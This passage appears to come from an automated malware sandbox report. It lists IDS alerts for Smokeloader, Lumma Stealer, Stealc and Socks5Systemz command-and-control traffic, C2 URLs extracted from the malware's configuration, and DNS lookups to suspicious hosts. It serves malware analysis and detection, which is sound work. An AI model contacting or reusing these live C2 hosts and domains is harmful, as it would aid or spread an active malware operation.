                  Source: unknownHTTPS traffic detected: 86.59.21.38:443 -> 192.168.2.9:49786 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.227.75.176:443 -> 192.168.2.9:49817 version: TLS 1.2

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49710 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2050567 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (gemcreedarticulateod .shop) 192.168.2.9:63216 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.9:49714 -> 104.21.45.242:80
                  Source: TrafficSnort IDS: 2050574 ET TROJAN Observed Lumma Stealer Related Domain (gemcreedarticulateod .shop in TLS SNI) 192.168.2.9:49716 -> 172.67.152.52:443
                  Source: TrafficSnort IDS: 2050564 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (secretionsuitcasenioise .shop) 192.168.2.9:52640 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2050577 ET TROJAN Observed Lumma Stealer Related Domain (secretionsuitcasenioise .shop in TLS SNI) 192.168.2.9:49718 -> 172.67.213.168:443
                  Source: TrafficSnort IDS: 2050565 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (claimconcessionrebe .shop) 192.168.2.9:53481 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2050572 ET TROJAN Observed Lumma Stealer Related Domain (claimconcessionrebe .shop in TLS SNI) 192.168.2.9:49720 -> 172.67.199.120:443
                  Source: TrafficSnort IDS: 2050566 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (liabilityarrangemenyit .shop) 192.168.2.9:50164 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2050578 ET TROJAN Observed Lumma Stealer Related Domain (liabilityarrangemenyit .shop in TLS SNI) 192.168.2.9:49723 -> 104.21.83.220:443
                  Source: TrafficSnort IDS: 2050578 ET TROJAN Observed Lumma Stealer Related Domain (liabilityarrangemenyit .shop in TLS SNI) 192.168.2.9:49724 -> 104.21.83.220:443
                  Source: TrafficSnort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.9:49731 -> 185.172.128.90:80
                  Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.9:49735 -> 185.172.128.79:80
                  Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.9:49735 -> 185.172.128.79:80
                  Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.9:49735 -> 185.172.128.79:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49744 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49747 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49752 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49753 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49756 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49757 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49758 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49760 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49761 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49764 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49765 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49766 -> 189.232.12.90:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49767 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49769 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49771 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49773 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49774 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49775 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49776 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49777 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49778 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49779 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49780 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49781 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49782 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49783 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49784 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49787 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49788 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49789 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49790 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49791 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49792 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49793 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49796 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49797 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49798 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49799 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49800 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49801 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49802 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49803 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49805 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49806 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49807 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49808 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49809 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49811 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49810 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49812 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49813 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49814 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49815 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49816 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49819 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49820 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49821 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49822 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49824 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49823 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49825 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49826 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49827 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49828 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49829 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49830 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49831 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49832 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49833 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49834 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49835 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49836 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49837 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49838 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49839 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49840 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49841 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49842 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49843 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49844 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49845 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49847 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49848 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49849 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49850 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49851 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49852 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49853 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49854 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49855 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49856 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49857 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49858 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49859 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49860 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49861 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49862 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49863 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49864 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49865 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49866 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49867 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49868 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49869 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49870 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49872 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49874 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49875 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49876 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49877 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49878 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49879 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49880 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49881 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49882 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49883 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49884 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49885 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49886 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49887 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49888 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49889 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49890 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49891 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49893 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.9:49892 -> 91.215.85.120:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49894 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49896 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49897 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49899 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49900 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49901 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49903 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49904 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:49905 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:50341 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:55644 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:57197 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:58448 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:59303 -> 185.196.8.22:80
                  Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.9:60102 -> 185.196.8.22:80
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeDomain query: my.account.sony.com
                  Source: C:\Windows\explorer.exeDomain query: winoui.com
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://goodfooggooftool.net/index.php
                  Source: Malware configuration extractorURLs: http://sulugilioiu19.net/index.php
                  Source: Malware configuration extractorURLs: http://selebration17io.io/index.php
                  Source: Malware configuration extractorURLs: http://vacantion18ffeu.cc/index.php
                  Source: Malware configuration extractorURLs: http://valarioulinity1.net/index.php
                  Source: Malware configuration extractorURLs: http://buriatiarutuhuob.net/index.php
                  Source: Malware configuration extractorURLs: http://cassiosssionunu.me/index.php
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: lsoccaz.b04rd.xyz
                  Source: DNS query: b04rd.xyz
                  Source: DNS query: lsoccaz.b04rd.xyz
                  Source: DNS query: b04rd.xyz
                  Source: DNS query: lsoccaz.b04rd.xyz
                  Source: DNS query: b04rd.xyz
                  Source: DNS query: mail.lsoccaz.b04rd.xyz
                  Source: DNS query: pop.b04rd.xyz
                  Source: DNS query: imap.b04rd.xyz
                  Source: DNS query: relay.lsoccaz.b04rd.xyz
                  Source: DNS query: pop3.b04rd.xyz
                  Source: DNS query: mailgate.b04rd.xyz
                  Source: DNS query: imap.lsoccaz.b04rd.xyz
                  Source: DNS query: mailgate.lsoccaz.b04rd.xyz
                  Source: DNS query: relay.b04rd.xyz
                  Source: DNS query: mail.lsoccaz.b04rd.xyz
                  Tries to resolve many domain names, but no domain seems valid
                  Source: unknownDNS traffic detected: query: mail.framalistes.org replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.b04rd.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: lsoccaz.b04rd.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.gpanel.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.accounts.google.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ssh.games.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.framalistes.org replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ftp.games.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.b04rd.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.lsoccaz.b04rd.xyz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.framalistes.org replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.login.aliexpress.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.help.steampowered.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.aniplus.tk replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop.ghaazalrad.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.fleeca.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mail.games.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.help.steampowered.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: gpanel.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ssh.account.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.my.bigcartel.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: mailgate.pma.capricehost.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.hamgam.medu.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.forum.cfx.re replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.exacyc.orion.education.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.life-invader.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.forum.cfx.re replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.gpanel.wingheberg.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: relay.store.steampowered.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: smtp.fleeca.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: imap.stressthem.to replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: account.gtav.adastragaming.fr replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: hamgam.medu.ir replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: pop3.espace-client-red.sfr.fr replaycode: Name error (3)
